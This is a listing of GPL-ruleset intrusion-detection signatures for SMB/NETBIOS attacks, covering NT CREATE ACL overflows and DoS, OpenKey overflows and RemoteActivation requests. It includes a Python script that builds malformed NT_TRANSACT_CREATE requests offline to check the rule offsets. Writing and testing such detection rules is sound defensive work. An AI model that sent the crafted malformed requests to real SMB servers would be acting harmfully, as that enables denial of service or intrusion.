Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103047

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103047; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103055

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103055; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103046

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103046; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103054

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103054; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103040

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103040; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103032

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103032; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103041

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103041; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103033

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103033; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103049

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103049; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103057

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103057; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103048

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103048; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103056

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103056; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined
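Added example, not part of the GPL ruleset or of this listing: a Python model of the byte walk the NT Trans NT CREATE rules above perform, so their offsets can be checked against a request built offline instead of a capture. The request builder, the zeroed NT_TRANSACT_CREATE parameter block, the TID/PID/UID/MID values and the S-1-5-18 trustee in the ACE are all constructed for the example. The walk follows the rules as written: byte_jump from_beginning lands on DataOffset counted from the payload start, which is 4 bytes (the NetBIOS session header) before the security descriptor, so distance:16 reaches OffsetSacl and distance:20 reaches OffsetDacl; the relative byte_jump then leaves the cursor 20 bytes into the ACL, where byte_test at -16 reads AceCount (with Sbz2 in the high half) and content at -10 reads the first ACE's AceSize. Rule pairs in this family that differ only in 16 versus 20 therefore read the SACL and the DACL respectively, regardless of the msg text.

```python
"""Walk an SMB_COM_NT_TRANSACT / NT_TRANSACT_CREATE request the way the
"NT Trans NT CREATE ... overflow" and "... ace size dos" rules do, on a
request constructed here (no capture is used)."""
import struct

SMB_COM_NT_TRANSACT = 0xA0
NT_TRANSACT_CREATE = 0x0001
SMB_FLAGS2_UNICODE = 0x8000
ACE_COUNT_THRESHOLD = 32          # byte_test:4,>,32 in the overflow rules


def build_ace(ace_size):
    """ACCESS_ALLOWED_ACE for S-1-5-18 (20 bytes on the wire). ace_size is
    written into the AceSize field literally, so it may disagree with the
    real length, which is what the "ace size dos" rules look for."""
    sid = struct.pack("<BB", 1, 1) + (5).to_bytes(6, "big") + struct.pack("<I", 18)
    return struct.pack("<BBH", 0, 0, ace_size) + struct.pack("<I", 0x001F01FF) + sid


def build_acl(ace_count, ace_size=20, n_aces=1):
    """ACL header (AclRevision, Sbz1, AclSize, AceCount, Sbz2) plus ACEs.
    ace_count is written literally too; the overflow rules test that field,
    not the number of ACEs actually present."""
    body = build_ace(ace_size) * n_aces
    return struct.pack("<BBHHH", 2, 0, 8 + len(body), ace_count, 0) + body


def build_sd(sacl=None, dacl=None):
    """Self-relative SECURITY_DESCRIPTOR: Revision, Sbz1, Control, then the
    Owner, Group, Sacl and Dacl offsets (0 when that part is absent)."""
    control = 0x8000 | (0x0010 if sacl else 0) | (0x0004 if dacl else 0)
    off_sacl = 20 if sacl else 0
    off_dacl = 20 + len(sacl or b"") if dacl else 0
    return struct.pack("<BBHIIII", 1, 0, control, 0, 0, off_sacl, off_dacl) + (sacl or b"") + (dacl or b"")


def build_nt_create_request(sd, unicode=True):
    """NetBIOS-framed SMB_COM_NT_TRANSACT request carrying sd in its Data
    block. ParameterOffset/DataOffset count from the start of the SMB header."""
    flags2 = SMB_FLAGS2_UNICODE if unicode else 0
    hdr = b"\xffSMB" + struct.pack("<BIBH", SMB_COM_NT_TRANSACT, 0, 0x18, flags2)
    hdr += b"\x00" * 12 + struct.pack("<HHHH", 1, 0xFEFF, 1, 1)   # PIDHigh, signature, reserved; TID, PID, UID, MID (constructed)
    params = b"\x00" * 53                 # NT_TRANSACT_CREATE parameter block, zeroed (constructed)
    param_off = 32 + 1 + 38 + 2           # header, WordCount, 19 words, ByteCount
    pad = (-(param_off + len(params))) % 4
    data_off = param_off + len(params) + pad
    words = struct.pack("<BHIIIIIIIIBH", 0, 0, len(params), len(sd), 0, 0,
                        len(params), param_off, len(sd), data_off, 0, NT_TRANSACT_CREATE)
    smb = hdr + bytes([19]) + words + struct.pack("<H", len(params) + pad + len(sd)) \
        + params + b"\x00" * pad + sd
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def rule_walk(payload):
    """Reproduce the rules' offsets. Returns the fields they test, or None."""
    if payload[0] != 0 or payload[4:8] != b"\xffSMB" or payload[8] != SMB_COM_NT_TRANSACT:
        return None
    unicode = bool(payload[15] & 0x80)                 # byte_test:1,&,128,6,relative: Flags2 high byte
    if payload[73:75] != b"\x01\x00":                  # content:"|01 00|"; within:2; distance:64
        return None
    data_off = struct.unpack_from("<I", payload, 68)[0]   # byte_jump:4,-7,little,relative,from_beginning
    sd = data_off + 4                                  # DataOffset ignores the 4-byte NetBIOS header
    off_sacl, off_dacl = struct.unpack_from("<II", payload, sd + 12)  # distance:16 -> OffsetSacl, 20 -> OffsetDacl
    out = {"unicode": unicode, "sacl": None, "dacl": None}
    for name, off in (("sacl", off_sacl), ("dacl", off_dacl)):
        if off == 0:                                   # content:!"|00 00 00 00|"
            continue
        acl = sd + off                                 # the relative byte_jump leaves the cursor at acl + 20
        ace_count = struct.unpack_from("<I", payload, acl + 4)[0]        # byte_test:4,>,32,-16: AceCount (+Sbz2)
        first_ace_size = struct.unpack_from("<H", payload, acl + 10)[0]  # content:"|00 00|"; distance:-10
        out[name] = {"ace_count": ace_count, "first_ace_size": first_ace_size}
    return out


def classify(payload):
    """The alert conditions, one label per rule family that would fire."""
    fields = rule_walk(payload)
    hits = []
    for name in ("sacl", "dacl"):
        if fields is None or fields[name] is None:
            continue
        if fields[name]["ace_count"] > ACE_COUNT_THRESHOLD:
            hits.append(name.upper() + " overflow attempt")
        if fields[name]["first_ace_size"] == 0:
            hits.append(name.upper() + " ace size dos attempt")
    return hits


if __name__ == "__main__":
    print(classify(build_nt_create_request(build_sd(dacl=build_acl(2, n_aces=2)))))    # []
    print(classify(build_nt_create_request(build_sd(dacl=build_acl(0x1000)))))          # ['DACL overflow attempt']
    print(classify(build_nt_create_request(build_sd(sacl=build_acl(1, ace_size=0)))))   # ['SACL ace size dos attempt']
```

The model checks header fields only, exactly as the rules do: it never confirms that AceCount or AceSize agree with the bytes that follow, so a receiver that trusts those fields before sizing its work is what the alerts are about, and an ACL whose declared AceCount is large but whose bytes are well-formed still fires the overflow rule.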

2103222

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103222; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : CVE-2000-0377

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103223

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103223; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : CVE-2000-0377

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103224

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103224; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : CVE-2000-0377

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103225

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103225; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : CVE-2000-0377

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103413

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103413; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103414

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103414; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103415

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103415; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103416

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103416; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103001

